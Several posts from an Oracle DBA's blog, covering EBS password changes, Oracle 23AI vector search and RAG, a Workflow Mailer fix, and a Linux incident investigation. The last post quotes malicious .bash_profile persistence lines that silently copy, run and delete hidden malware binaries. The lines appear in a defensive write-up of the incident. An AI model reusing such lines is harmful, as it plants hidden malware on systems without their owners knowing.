Wednesday, March 5, 2025

EBS 12.2 -- Password Change / Special Characters / FNDCPASS and all that.

If you change the APPS password to something with special characters in it by the wrong way, you may encounter "ORA-01017: invalid username/password; logon denied" errors, almost in anything that touches the EBS DB. 

Here is an example thread in my forum : http://erman-arslan-s-oracle-forum.124.s1.nabble.com/db-connection-error-after-APPS-password-change-td12919.html

Note that, using the FNDCPASS utility to change the passwords of database users such as APPS , APPLSYS, GL etc to include special characters is NOT supported. I haven't tried it but I think the same goes for AFPASSWD (enhanced version of FNDCPASS).

However; you may use FNDCPASS to change an application user password (such as SYSADMIN's password)  to a value with specials characters. But! if you want to do that, you may need to use quotation marks.

Here is an example:

FNDCPASS apps/apps 0 Y system/manager USER SYSADMIN '$welcome1'

Note that, for some special characters, you don't need to use quotation marks.. This is by design..

Check the MOS note given below for supported special characters in application user passwords and the requirement of quotation marks in case of using them with FNDCPASS.

R12: How to change passwords to include special characters using FNDCPASS? (Doc ID 1336479.1)

Friday, February 28, 2025

GTech, Oracle Event - Oracle Database 23AI and OEM 24AI

I have spoken at many events, I have lost the count, but this one was so much fun. 

I explained the unification of AI (Vectors, and DB integrated GEN-AI with RAG) , Graph and Native JSON in the context of Converged Oracle Database. I presented key new features of Oracle Database 23 AI and did a demo of a RAG solution that we developed in-house using Oracle Database 23AI and OCI's integrated GEN AI models and Cohere's GEN AI models.

We also talked about the AI-powered features of new Oracle EM. It was fun and it was beneficial to the community. We eagerly await the 23AI upgrades in the near future.

A formal intro for my speech was as follows: 

GTech Senior System and Database Management Director, Oracle ACE Pro♠️ Erman Arslan explained how our infrastructure and system services enhance database performance, security, and resilience, while showcasing the next-generation speed and efficiency solutions offered by Oracle Database 23AI with AI.


My Podcast: Ayna Düşünceler (Mirror thoughts) available on Spotify

A result of curiosity, passion and research. Occasional audio representations of my blog posts. 

I share interesting thoughts in the fields of Physics, Philosophy and Computer Science, what I have learned from academic studies and my own experiences and intellectual gymnastics. 

This will be a series of talks that are close to popular science but also try to go deep from time to time. 

I will have a series of posts where I do not aim to make income or profit, I talk about topics that I think the interested parties will like. 

These topics are the ones that I can say interesting things about. I hope you will like.. It is available on Spotify and it is in Turkish Language at the moment.


The following video was recorded as a memory. Currently I'm very busy with my day job but I may have a Youtube channel one day, who knows :)


Monday, December 16, 2024

Building a Retrieval-Augmented Generation (RAG) System with Oracle Database 23AI, OCI and LLM(s): Powering Up Information Retrieval with AI

Greetings, database enthusiasts! Today, we're diving into the exciting world of Retrieval-Augmented Generation (RAG) systems.  Here I 'am blogging again. This time with the motivation of Oracle Database 23 AI's vector capabilities, that we leveraged while building ourselves a Sales Assistant. While leveraging the power of Oracle 23AI, we also used OCI 's and Cohere's large language models (and integrations), and Flask for building our solution. This AI bases Sales Assistant is in beta version, but we can make it production ready by putting a little more effort, and making it reach perfection.

Basically, our sales assistant takes questions from the user and provides answers by using the LLM models in the backend. However; the answers generated by the LLM modes are always kept in the context, and this is done by the help of RAG (and some orchestration done via our python code.)

The value here is that, we used Oracle Database 23AI for our vector store. So we didn't position a separate database for storing vector embeddings and doing vector similarity searches.

You can extrapolate that and think of what you can do with these types of new features of Oracle Database 23AI.

Anyways.. What about RAG?

Imagine a system that can not only find relevant information but also craft insightful answers based on that knowledge. That's the essence of RAG. It takes information retrieval a step further by using generative models to create comprehensive responses to user queries.

Our Project: 

In this project, we created a custom RAG system that leverages three key players:

Oracle 23AI: Oracle's new version database acts as our knowledge repository, storing documents and their corresponding vector embeddings (think of them as condensed representations capturing the document's meaning).

Cohere: We'll tap into Cohere's arsenal of LLMs, like command-r-plus, for answer generation. These models are masters at weaving words into coherent and informative responses.

Flask: This lightweight web framework serves as the user interface, allowing users to interact with our system and receive answers to their questions.

The Deep Dive: How It Works

Query Embeddings: When a user asks a question, the system transforms it into an embedding using Cohere. This embedding becomes the key to unlocking relevant information.

Knowledge Retrieval: The system dives into the Oracle 23AI database, wielding the power of vector similarity search. It compares the query embedding with stored document embeddings to identify the most relevant documents – think of it as finding the closest matches in the knowledge vault.

Refining the Results: Not all retrieved documents are created equal. We utilize Cohere's reranking model to sort these documents by their true relevance to the user's query, ensuring the most pertinent ones are at the forefront.

Answer Generation: Now comes the magic! Cohere's LLM takes center stage. It analyzes the query and the top-ranked documents, crafting a comprehensive answer that incorporates both the user's intent and the relevant retrieved information. 

Serving Up the Answer: Finally, the user receives the answer, along with the most relevant documents to provide context and transparency.

Why Oracle 23AI?

Here's why Oracle 23AI is the perfect partner for our RAG system:

Vector Powerhouse: Its vector datatype enables efficient storage, indexing, and retrieval of document embeddings, crucial for speedy searches.

Scalability: As our system grows, Oracle 23AI can handle the increasing volume of data with ease.

A Word on Overcoming Challenges

During our project, we encountered a minor problem: the Frankfurt region on Oracle Cloud Infrastructure (OCI) didn't support the specific Cohere model we needed. --Note that, for some part of the work, we reached LLM models through OCI (via its services -- integration), and for some other part of it (like the text generation), we reached LLM models directly from our code..-- So, we switched to the Chicago region, which provided seamless integration. Just a reminder, sometimes a quick regional shift can save the day!

The Future of RAG: A World of Possibilities

RAG systems hold immense potential to revolutionize information retrieval. By combining retrieval-based approaches with generative models, we can create systems that understand user intent, provide comprehensive answers, and constantly learn and improve.

Ready to Build Your Own RAG System?

This blog post serves as a springboard for your RAG exploration. With the power of Oracle 23AI, Cohere, and Flask, you can create a system that empowers users to unlock the true potential of information. Stay tuned for future posts where we delve deeper into the code and implementation details!

As always, feel free to leave any questions or comments below. 

Wednesday, December 4, 2024

Exploring the limitations of classical computing and the types of business problems Quantum is best suited for.

By studying the Quantum Business Foundations, I revisited (and updated) the relevant part of my knowledge base, which was about the limitations of classical computing and the types of business problems quantum is best suited for (including the answer for the question why). 

This was for identifying the implications of the paradigm shift brought about by quantum to the business strategy, technology and operating model.

Friday, November 29, 2024

Diving practically into Quantum-Safe Cryptography

Let's protect our confidential information, our secrets with mechanisms and algorithms that are computationally difficult to break. Think ahead and make your crypto system be ready for the future. Post Quantum Cryptography it is . Be quantum-proof, quantum-safe, quantum-resistant..

Enough for the passioned intro :) I received my second certificate in IBM quantum and I am sharing it here. More to come :)

This was for being able to understand the foundations of cryptography, how the cybersecurity risk landscape is evolving in the quantum era, and how to protect against such threats through the use of new encryption algorithms.

Tuesday, June 11, 2024

EBS 12.2 -- Wf Mailer ( Mail Status SENT but No Email Delivered + Email From Section cannot be set to desired email address)


EBS Workflow Mailer  A Tale of Two Mysteries 

Alright folks, buckle up for some classic EBS weirdness! This one involves the Workflow Notification Mailer in a fresh Oracle EBS 12.2.11 project. We got it all configured, tested it – IMAP, SMTP, everything seemed okay. But then, like a magic trick gone wrong, emails stopped flowing. 

The customer's mail admin checked the server logs, but saw nothing. Their words? "Your mailer taps the SMTP server on the shoulder, then just walks away. No emails, no nothin'." We chased network packets, analyzed traces – same story. The mailer wasn't even attempting to send anything. No errors,  just a complete disregard for its duties.

Telnet tests? Perfect. Workflow mail status? "SENT".  We disabled everything : disabling TLS/SSL, using relays – nothing worked. Finally, in a moment of desperation, we cleared the functional admin cache and restarted the mailer. And bam! Emails started flowing again.

We suspect a wrong configuration stuck there, during all our testing. Maybe a change, not even directly related to the mailer, messed with some underlying setting it relies on (a sneaky delivery preference, perhaps?). Whatever it was, clearing the cache did the trick.

But wait, there's more! The emails sent by the mailer had some strange "From" address, in the format of "<Workflow SMTP account/username>". We tried everything on the mailer side to change it, but nothing helped. Turns out, the mail server itself was missing a crucial piece – the setting of the display name. Without it, the server's default config (for the from field) was overriding (it seems so) the workflow mailer's settings.

So, the customer added a display name – "WF Mailer PROD EBS 12.2" (exactly what we wanted!) – on the mail server. And mystery number two solved.

Moral of the story? EBS can be a box of chocolates. You never know what you're gonna get. But hey, at least we got the mail flowing and the "From" address looking as we wanted. Now, if you'll excuse me, I need a strong cup of coffee to recover from that rollercoaster ride :)

Tuesday, June 4, 2024

Converged Database - Oracle Database 23AI Vector Search - Combine traditional search on business data with AI vector powered similarity search.

 

Oracle Database 23AI Vector Search: A Game Changer for Enterprise Search

Hey everyone, Erman Arslan here. Today, I'm diving into a revolutionary new feature in Oracle Database 23AI: Vector Search. This technology promises to completely transform how you search for information, especially within your enterprise data.

Understanding Semantics Through Vectors

Imagine searching for data based on meaning, not just keywords. That's the power of Vector Search. It uses machine learning embedding models, like ResNet for images and Bert for text, to convert your data into vectors. These vectors represent the semantic essence of your information. Similar entities will have vectors close together in this multidimensional space.

The Power of Combining Traditional and AI-powered Search

The beauty of Oracle Database 23AI is that it seamlessly integrates traditional search with AI-powered vector similarity search. This eliminates the need for placing separate Vector Databases. which can lead to data staleness, increased complexity, hard-to-maintain consistency, and security risks.

23AI: The Enterprise-grade Advantage

Here's where Oracle shines. Oracle Database 23AI, is a converged platform that eliminates the complexities of managing separate systems. It also tackles a major challenge of Large Language Models (LLMs): hallucination. By combining LLM knowledge with relevant search results from vector searches, 23AI ensures accurate and reliable responses.

LLM + AI Vector Search: A Powerful Knowledge Base

Imagine this: you have a vast knowledge base that combines real-time enterprise data with a broad range of information from the internet. That's the magic of LLM and AI Vector Search working together. Users submit queries, which are encoded as vectors and searched against the database. The closest matches are then fed to the LLM, empowering it to deliver comprehensive and informative responses.

"LLM + AI Vector Search" means broad Range of data from internet snapshot of data from a point in time + Private Enterprise Business Data !!! (Real Time updating the knowledge base...)

Unveiling the New SQL for Vector Power

23AI introduces a range of new SQL features to unleash the power of vector searches:

  • New SQL for Vector Generation: Easily generate vectors from your data.
  • New Vector Data Type: Store vector embeddings efficiently using the new VECTOR data type.
  • New Vector Search Syntax: Perform efficient similarity searches with the VECTOR_DISTANCE function and optional distance metrics.
  • New Approximate Search Indexes: Achieve high performance with approximate search indexes for large datasets.
  • New PL/SQL Packages and Integrations: Extend the functionality with PL/SQL packages and integrate with third-party frameworks for building robust AI pipelines.

Crafting Powerful Vector Search Queries

Here's an example query that demonstrates the power of vector search:

SQL

SELECT ... FROM JOB_Postings WHERE city IN (SELECT PREFERRED_ CITIES FROM Applications...) ORDER BY vector_distance(job_desc_vectors, :resume_vector) FETCH APPROXIMATE FIRST 10 ROWS ONLY WITH TARGET ACCURACY 90;

This query searches for job postings with job descriptions most similar to the provided resume vector, ensuring a perfect match for the candidate.

Choosing the Right Vector Index

23AI offers two types of vector indexes for optimal performance:

  • Graph Vector Index: In-memory index for fast and highly accurate searches on smaller datasets.
  • Neighbor Partition Vector Index: Scalable index for massive datasets that can't fit in memory. It delivers fast results with a high chance of finding relevant matches.
Here is an index creation Example/Syntax;

DDL

CREATE VECTOR INDEX photo_idx ON Customer(photo_vector) 
ORGANIZATION [INMEMORY_ NEIGHBOR GRAPH | NEIGHBOR PARTITIONS]
DISTANCE COSINE | EUCLIDEAN | MANHATTAN | ... WITH TARGET ACCURACY 90 (Here we can specify the accuracy.. )

Note that, we use APPROXIMATE keyword to tell the  optimizer use the relevant index But even if we specify that, Oracle's Cost Based optimizer can still do exact searches, if it finds the index access costly. Ex: FETCH APPROXIMATE FIRST 5 ROWS ONLY.

The Importance of Enterprise-grade CBO

Optimizing vector search queries, especially when combined with normalized enterprise data, requires an enterprise-grade Cost-Based Optimizer (CBO). 23AI delivers on this front, unlike purpose-built vector databases that lack this crucial functionality.

Beyond Single Vectors: Multi-Vector Queries

23AI empowers you to perform multi-vector queries, allowing you to search based on a combination of different vectors.

Key Differentiators: Why Choose Oracle Database 23AI

  • Transactional Consistency: Neighbor Partition Vector Indexes guarantee transactional consistency, making them ideal for high-speed, consistent operations.
  • Scale-out Architecture: Distribute vector search workloads across RAC nodes for exceptional scalability.
  • Exadata Offloading: Offload vector search tasks to Exadata Storage for even greater performance.
  • Seamless Integration: Oracle Sharding, parallel execution, partitioning, security, etc.. All work seamlessly with AI Vector Search.

AI Vector Search: The Engine of GEN AI Pipelines

23AI goes beyond search. It serves as the foundation for powerful GEN AI Pipelines. These pipelines seamlessly integrate document loading, transformation, embedding models, vector search, and LLM reasoning – all within the robust Oracle Database 23AI platform.

This is just a glimpse into the exciting world of Oracle Database 23AI Vector Search. Stay tuned for future posts where we'll delve deeper into specific use cases and explore the key features (like True Cache and Distributed-Database related enhancements...) of the new Oracle Database Release.

Friday, May 31, 2024

Erman Arslan's Oracle Forum / APR 23 - MAY 31, 2024 - "Q & A Series"

Empower yourself with knowledge! Erman Arslan's Oracle Blog offers a vibrant forum where you can tap into a wealth of experience. Get expert guidance and connect with a supportive community. Click the banner proclaiming "Erman Arslan's Oracle Forum is available now!" Dive into the conversation and ask your burning questions.

-- or just use the direct link: http://erman-arslan-s-oracle-forum.124.s1.nabble.com A testament to its vibrancy: over 2,000 questions have been posed, sparking nearly 10,000 insightful comments. Explore the latest discussions and see what valuable knowledge awaits!



Supporting the Oracle users around the world. Let's check what we have in the last few weeks..

Tuesday, May 14, 2024

Linux -- Decoding the High CPU Usage Mystery: A Bash Shell Odyssey / Autogenerating bash process - Malware - klibsystem5 & bprofr

 

Decoding the High CPU Usage Mystery: A Bash Shell Odyssey


This blog post details the investigation of a high CPU usage issue caused by a rogue bash process on an Oracle Linux server. This systematic investigation identified malicious scripts causing the high CPU usage. This blog post also offers valuable insights into troubleshooting bash process issues and highlights the importance of secure system configurations. 

Note that, this is based on a real story. (an issue reported to me through my forum: Erman Arslan's Oracle Forum)

The Case:

Customer, encountered a bash process consuming 98% CPU. Killing it only brought temporary relief as it automatically restarts.

The Investigation Begins:

I requested more information to understand the process's behavior. Customer provided the top command output, revealed the bash process with a high CPU usage.

Digging Deeper:

I suggested using ps with the -elf flag to get detailed process information. This revealed the bash process is in the sleeping state (s). Analyzing the /proc/8879/cmdline file confirmed it was a bash shell, but the process seemed inactive. Note that 8879 was the PID of the process.

Next, I requested the output of w to see logged-in users and processes. This helped rule out user interaction as the cause.

Process Examination:

I instructed customer to examine the contents of the bash process's working directory (/proc/8879/cwd) and open file descriptors (cd /proc/8879/fd/; ls -la). This revealed the process had file descriptors related to appsdev, a development OS user, and seemed to be waiting for an event (eventpoll).

Background info:

Unknown process with -bash not showing it: This process might be a child process spawned by the bash shell itself, or another system service running in the background.

4 -> anon_inode:[eventpoll]: This indicates the process is using an event poll mechanism to monitor events from various sources.
9 -> anon_inode:[eventfd]: This suggests the process might be using an eventfd for efficient inter-process communication or signaling.

It is probably a OS process.. Probably, OS or a daemon starts it.. It may belong to a monitoring process such as systemd-monitor.

*Use ps aux or pstree to get a detailed listing of running processes. Look for processes with a parent process ID (PPID) matching the bash shell (bash).

Stracing the System Call:

I analyzed the output of strace on the process. This confirmed the bash process was stuck in the epoll_pwait system call, waiting for events from an epoll instance. The repeated calls with timeouts suggested it wasn't receiving expected events. Here's how to interpret the output and troubleshoot further:

epoll_pwait: This system call waits for events on an epoll instance. It's a mechanism for efficient I/O waiting in applications.

The arguments to epoll_pwait specify the epoll instance, timeout values, and number of events to wait for.

Analysis of strace Output:

The process repeatedly calls epoll_pwait with a timeout (values like 182, 220, etc.).

Between calls, it uses clock_gettime to get the current time. This suggests the process isn't receiving expected events and keeps waiting with timeouts.

Suggested more investigation:

  • Check cron jobs and systemd services for any entries that might be starting the bash process.
  • Review system logs (/var/log/messages and dmesg) for any errors related to the process.
  • Investigate Script Purpose.. If the script is legitimate, investigate its purpose and modify it to avoid excessive I/O calls and resource usage.
  • Debug Bash Processes (Cautionary Approach): I warned about the risks of enabling debug for all bash processes. This was a complex approach and should have been only be attempted with a thorough understanding of the potential consequences.
  • Suggested commands for getting information on the context : 
    • pstree
    • cat /proc/<pid>/cmdline
    • cat /proc/<pid>/cwd
    • cd /proc/<pid>/fd; ls -al
    • ls -l /proc/<pid>/cwd
    • strace -p <pid>
    • lsof -p <pid>
    • crontab -l
    • systemd services with systemctl list-unit-files and systemctl status <service_name>.
    • cat .bash_profile (customer discovered this one.. by the help of the suggestions)

The Culprit Revealed:

With the provided guidance, customer discovered a suspicious entry in his .bash_profile that was designed to automatically copy and execute a script (/tmp/-bash). This script appeared to be scanning for open ports (80, 443, etc.). This explained the eventpoll descriptor and the process waiting for I/O.

--
I can see, there is an entry made in .bash_profile by automatically. please see below:
cp -f -r -- /bin/klibsystem5 2>/dev/null && /bin/klibsystem5 >/dev/null 2>&1 && rm -rf -- /bin/klibsystem5 2>/dev/null
cp -f -r -- /tmp/.pwn/bprofr /tmp/-bash 2>/dev/null && /tmp/-bash -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- /tmp/-bash 2>/dev/null

--

*The system was affected by klibsystem4 and bprofr.. These were malwares..

Suggestions for the fix:

  • Manual removal of the malware(s) - klibsystem5 & bprofr , by discovering their source files and the affected system files and deleting(purifying in the case of the system files) all of them one by one.
  • Migrating the affected applications / databases to a new server.. This might be a better option in the case we can't be sure about the removal of whole of the malware(s). But if we migrate, there is a risk that we migrate the malware too. So a careful and delicate work is required..